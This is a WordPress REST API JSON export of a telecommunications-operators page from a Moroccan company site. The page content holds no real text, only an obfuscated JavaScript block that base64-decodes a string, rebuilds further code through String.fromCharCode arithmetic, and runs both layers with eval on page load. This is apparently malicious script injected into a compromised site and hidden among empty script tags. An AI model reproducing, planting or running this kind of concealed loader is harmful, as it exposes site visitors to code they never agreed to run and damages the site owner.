{"id":227,"date":"2016-02-05T23:58:45","date_gmt":"2016-02-05T23:58:45","guid":{"rendered":"http:\/\/www.sam-solutions.ma\/?page_id=227"},"modified":"2018-01-06T20:43:25","modified_gmt":"2018-01-06T20:43:25","slug":"operateurs-de-telecommunications","status":"publish","type":"page","link":"https:\/\/www.sam-solutions.ma\/es\/operateurs-de-telecommunications\/","title":{"rendered":"Op\u00e9rateurs de t\u00e9l\u00e9communications"},"content":{"rendered":"<p><script> <\/script> <script> <\/script> <script> <\/script><br \/>\n<script type=\"text\/javascript\">\nvar PMOJVNJFCP = atob('dmFyIFpEV0xOVlpDV0MgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTIyIC0gNCwgOTggLSAxLCAxMTYgLSAyLCAzMyAtIDEsIDExNiAtIDksIDEwNiAtIDUsIDEyMyAtIDIsIDM5IC0gNywgNjIgLSAxLCAzNyAtIDUsIDQwIC0gMSwgMTA1IC0gNiwgNzYgLSA2LCAxMTIgLSAzLCA3NCAtIDEsIDg3IC0gMywgOTQgLSA2LCAxMjcgLSA3LCA4NCAtIDUsIDc2IC0gNSwgODIgLSA4LCA0NSAtIDYsIDY0IC0gNSwgMTIgLSAyLCAxMjAgLSAyLCAxMDIgLSA1LCAxMTYgLSAyLCAzMyAtIDEsIDEwOSAtIDgsIDExNyAtIDcsIDEwNyAtIDgsIDExMCAtIDksIDEwMyAtIDMsIDM2IC0gNCwgNzAgLSA5LCAzMyAtIDEsIDQyIC0gMywgNzcgLSA3LCA4NiAtIDMsIDEwOCAtIDksIDEwMyAtIDEsIDEwMyAtIDYsIDkyIC0gOSwgODggLSA3LCAxMTQgLSAxLCA3OCAtIDYsIDExNCAtIDksIDg3IC0gOSwgMTE4IC0gOCwgMTA0IC0gNCwgNTYgLSA4LCA3OCAtIDEsIDEwOSAtIDQsIDY3IC0gMiwgMTA4IC0gMywgMTE0IC0gMywgMTA2IC0gMiwgODcgLSA5LCA5MCAtIDgsIDUzIC0gNSwgMTEwIC0gNiwgODYgLSA5LCA1MiAtIDIsIDgyIC0gMSwgNjcgLSAyLCA3OSAtIDEsIDc0IC0gOSwgMTEwIC0gNywgMTE0IC0gMywgNzggLSA1LCA3NiAtIDgsIDU1IC0gNywgNjEgLSA0LCA3NCAtIDEsIDEyOSAtIDgsIDc3IC0gNCwgMTE0IC0gNCwgNzQgLSA4LCAxMDYgLSAxLCAxMDYgLSAzLCA5NiAtIDYsIDkzIC0gNCwgOTEgLSAzLCA4MSAtIDQsIDExOCAtIDQsIDgwIC0gOSwgMTI5IC0gNywgNTQgLSA2LCAxMjQgLSA3LCA4NCAtIDUsIDExMiAtIDgsIDEwMiAtIDIsIDEwNyAtIDMsIDg1IC0gMywgODAgLSA4LCA4MSAtIDcsIDEwOCAtIDcsIDgyIC0gNywgNzIgLSA3LCAxMTMgLSAyLCAxMTcgLSA1LCA3OSAtIDQsIDU0IC0gNCwgODIgLSAxLCA4OCAtIDcsIDgyIC0gOSwgMTI1IC0gNSwgMTA5IC0gMiwgNzkgLSA2LCA4MSAtIDgsIDc1IC0gOCwgMTI3IC0gOCwgNzkgLSA0LCA4MSAtIDcsIDEwOCAtIDMsIDk0IC0gOSwgNTAgLSAzLCA3NSAtIDUsIDEyMyAtIDIsIDgyIC0gNCwgNzIgLSAyLCAxMDEgLSAzLCAxMTQgLSA5LCAxMDQgLSA1LCAxMTUgLSAyLCA3MiAtIDEsIDU1IC0gNSwgMTA2IC0gMiwgMTE1IC0gMSwgMTA3IC0gOSwgODkgLSA4LCAxMjMgLSA4LCAxMjUgLSA0LCA3NCAtIDMsIDkzIC0gOSwgMTEyIC0gNCwgMTIwIC0gMywgMTA2IC0gNiwgNTUgLSA2LCAxMDIgLSAzLCA2NCAtIDksIDgyIC0gNCwgODUgLSAyLCAxMjMgLSA4LCA3MiAtIDIsIDc5IC0gNiwgNzEgLSA2LCA4MyAtIDIsIDEyMSAtIDgsIDgxIC0gMywgOTEgLSA4LCAxMDQgLSAxLCA4NiAtIDQsIDk1IC0gNiwgODkgLSA2LCAxMTMgLSA2LCAxMTUgLSA2LCA4NiAtIDIsIDczIC0gNSwgOTMgLSA4LCA5NiAtIDYsIDc3IC0gMiwgNzUgLSA4LCA3NCAtIDksIDEyNSAtIDUsIDc4IC0gNywgNTggLSA4LCA3MiAtIDcsIDExOSAtIDYsIDc4IC0gMywgMTI0IC0gNSwgMTEyIC0gMSwgMTE3IC0gNiwgODMgLSAyLCAxMjkgLSA4LCA3OSAtIDIsIDExMSAtIDEsIDEwNCAtIDIsIDU0IC0gNSwgNzUgLSA1LCA1NCAtIDYsIDkyIC0gOCwgODYgLSAzLCA1NiAtIDQsIDgwIC0gMywgODIgLSA4LCA4OSAtIDcsIDEwNSAtIDIsIDExNiAtIDksIDg2IC0gOSwgODUgLSAxLCA5NiAtIDcsIDgzIC0gNiwgOTAgLSAxLCA5MCAtIDcsIDYwIC0gNCwgMTI3IC0gOSwgNjcgLSAyLCAxMDggLSAzLCA4MCAtIDYsIDcxIC0gMywgNzcgLSAyLCA3MiAtIDUsIDg5IC0gOCwgMTE5IC0gOCwgNzYgLSA0LCA5MSAtIDgsIDcwIC0gMSwgMTEwIC0gNCwgNzIgLSA1LCA5MCAtIDksIDExOCAtIDMsIDEyMyAtIDUsIDc0IC0gOSwgODYgLSAzLCA1NCAtIDUsIDU3IC0gMSwgNzYgLSAxLCA3NCAtIDksIDExOSAtIDgsIDEyMCAtIDgsIDgxIC0gNiwgNTEgLSAxLCA3OSAtIDEsIDkzIC0gNCwgOTAgLSA2LCA3NCAtIDksIDY4IC0gNywgNjQgLSAzLCA0MCAtIDEsIDYzIC0gNCwgMTkgLSA5LCAxMDQgLSAyLCAxMjIgLSA1LCAxMTYgLSA2LCAxMDEgLSAyLCAxMTcgLSAxLCAxMTEgLSA2LCAxMTQgLSAzLCAxMTQgLSA0LCAzNCAtIDIsIDEyOCAtIDgsIDExNyAtIDYsIDEyMyAtIDksIDk2IC0gMSwgMTA1IC0gNCwgMTExIC0gMSwgMTAyIC0gMywgNDMgLSAzLCAxMTYgLSAxLCAxMTkgLSAzLCAxMTggLSA0LCAxMTQgLSA5LCAxMTggLSA4LCAxMTEgLSA4LCA0OCAtIDQsIDQwIC0gOCwgMTEyIC0gNSwgMTA0IC0gMywgMTI3IC0gNiwgNDUgLSA0LCAzNiAtIDQsIDEzMSAtIDgsIDEyIC0gMiwgMzkgLSA3LCAzNCAtIDIsIDEyNiAtIDgsIDEwNCAtIDcsIDEyMyAtIDksIDM5IC0gNywgMTE2IC0gMiwgMTA3IC0gNiwgMTIxIC0gNiwgMzUgLSAzLCA2MyAtIDIsIDM4IC0gNiwgNDAgLSAxLCA0OCAtIDksIDY4IC0gOSwgMTEgLSAxLCAzNyAtIDUsIDM2IC0gNCwgMTA5IC0gNywgMTE2IC0gNSwgMTIyIC0gOCwgMzggLSA2LCA0OSAtIDksIDEyNiAtIDgsIDEwMSAtIDQsIDExNyAtIDMsIDM1IC0gMywgMTA4IC0gMywgMzkgLSA3LCA2NyAtIDYsIDMzIC0gMSwgNTYgLSA4LCA2NCAtIDUsIDQwIC0gOCwgMTA4IC0gMywgMzggLSA2LCA2MSAtIDEsIDM2IC0gNCwgMTIyIC0gNywgMTE5IC0gMywgMTIyIC0gOCwgMTEwIC0gNSwgMTE2IC0gNiwgMTEyIC0gOSwgNTMgLSA3LCAxMTQgLSA2LCAxMDggLSA3LCAxMTEgLSAxLCAxMDcgLSA0LCAxMjMgLSA3LCAxMTIgLSA4LCA2MiAtIDMsIDM3IC0gNSwgMTA5IC0gNCwgNDggLSA1LCA0OCAtIDUsIDQ4IC0gNywgMzQgLSAyLCAxMzAgLSA3LCAxNCAtIDQsIDM5IC0gNywgMzUgLSAzLCAzNyAtIDUsIDM3IC0gNSwgMTIzIC0gOSwgMTA5IC0gOCwgMTIzIC0gOCwgNDEgLSA5LCA1MiAtIDksIDYyIC0gMSwgMzMgLSAxLCA4NCAtIDEsIDEyNCAtIDgsIDExOCAtIDQsIDExMCAtIDUsIDExNCAtIDQsIDExMSAtIDgsIDQ3IC0gMSwgMTA1IC0gMywgMTE1IC0gMSwgMTE1IC0gNCwgMTExIC0gMiwgNzAgLSAzLCAxMTEgLSA3LCA5OSAtIDIsIDEyMSAtIDcsIDc2IC0gOSwgMTEzIC0gMiwgMTA3IC0gNywgMTA2IC0gNSwgNDUgLSA1LCAxMTggLSAzLCAxMjUgLSA5LCAxMjMgLSA5LCAxMTIgLSA3LCAxMTYgLSA2LCAxMDkgLSA2LCA1MSAtIDUsIDEwMiAtIDMsIDExMyAtIDksIDk4IC0gMSwgMTE1IC0gMSwgNzIgLSA1LCAxMTMgLSAyLCAxMDggLSA4LCAxMDYgLSA1LCA2OCAtIDMsIDEyMSAtIDUsIDQ2IC0gNiwgMTEwIC0gNSwgNDQgLSAzLCA0MCAtIDgsIDk2IC0gMiwgMTkgLSA5LCAxMSAtIDIsIDE3IC0gOCwgMTAgLSAxLCAxMCAtIDEsIDEwOSAtIDIsIDEwMyAtIDIsIDEyNCAtIDMsIDU0IC0gOCwgMTAyIC0gMywgMTA2IC0gMiwgOTkgLSAyLCAxMTkgLSA1LCA2OCAtIDEsIDExNSAtIDQsIDEwOCAtIDgsIDEwOSAtIDgsIDcyIC0gNywgMTIyIC0gNiwgNDYgLSA2LCAxMTQgLSA5LCAzOCAtIDYsIDQxIC0gNCwgNDAgLSA4LCAxMTUgLSA4LCAxMDUgLSA0LCAxMjUgLSA0LCA1MyAtIDcsIDEwOSAtIDEsIDEwNCAtIDMsIDExMyAtIDMsIDEwNiAtIDMsIDEyMSAtIDUsIDExMSAtIDcsIDUwIC0gOSwgNDIgLSAxLCA2NiAtIDcsIDE3IC0gNywgMzggLSA2LCA0MCAtIDgsIDEyNiAtIDEsIDExIC0gMSwgMzMgLSAxLCAzNyAtIDUsIDEyMyAtIDksIDEwNCAtIDMsIDEyNCAtIDgsIDExOSAtIDIsIDExOSAtIDUsIDExNSAtIDUsIDQwIC0gOCwgMTIyIC0gOCwgMTA4IC0gNywgMTE5IC0gNCwgNjUgLSA2LCAxNSAtIDUsIDEzMSAtIDYsIDE1IC0gNSwgMTIgLSAyLCAxMjYgLSA4LCAxMDIgLSA1LCAxMjEgLSA3LCAzNyAtIDUsIDEwNCAtIDQsIDEwNSAtIDQsIDEwNCAtIDUsIDM5IC0gNywgNjMgLSAyLCAzNCAtIDIsIDEyMiAtIDIsIDExOSAtIDgsIDExNyAtIDMsIDk5IC0gNCwgMTA5IC0gOCwgMTEzIC0gMywgMTAxIC0gMiwgNDQgLSA0LCAxMDEgLSA0LCAxMjQgLSA4LCAxMTggLSA3LCAxMDQgLSA2LCA0MiAtIDIsIDExMCAtIDksIDExOCAtIDgsIDEwOCAtIDksIDEwMiAtIDEsIDEwNSAtIDUsIDQ3IC0gNiwgNDggLSA0LCAzOCAtIDYsIDExMSAtIDQsIDEwNiAtIDUsIDEzMCAtIDksIDQzIC0gMiwgNjQgLSA1LCAxNiAtIDYsIDQ1IC0gNSwgMTE2IC0gNiwgMTA4IC0gNywgMTI1IC0gNiwgMzMgLSAxLCA3MiAtIDIsIDEyNSAtIDgsIDExOCAtIDgsIDEwNiAtIDcsIDExOSAtIDMsIDExMSAtIDYsIDExMiAtIDEsIDExMSAtIDEsIDQzIC0gMywgMTA3IC0gNywgMTA5IC0gOCwgMTA2IC0gNywgNDIgLSAxLCA1MCAtIDksIDQ3IC0gNywgNDMgLSAyLCA2NSAtIDYsIDEzIC0gMywgMTMgLSAzKTtldmFsKFpEV0xOVlpDV0MpOw=='); \neval(PMOJVNJFCP);\n<\/script><\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-227","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.sam-solutions.ma\/es\/wp-json\/wp\/v2\/pages\/227","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sam-solutions.ma\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.sam-solutions.ma\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.sam-solutions.ma\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sam-solutions.ma\/es\/wp-json\/wp\/v2\/comments?post=227"}],"version-history":[{"count":3,"href":"https:\/\/www.sam-solutions.ma\/es\/wp-json\/wp\/v2\/pages\/227\/revisions"}],"predecessor-version":[{"id":1546,"href":"https:\/\/www.sam-solutions.ma\/es\/wp-json\/wp\/v2\/pages\/227\/revisions\/1546"}],"wp:attachment":[{"href":"https:\/\/www.sam-solutions.ma\/es\/wp-json\/wp\/v2\/media?parent=227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}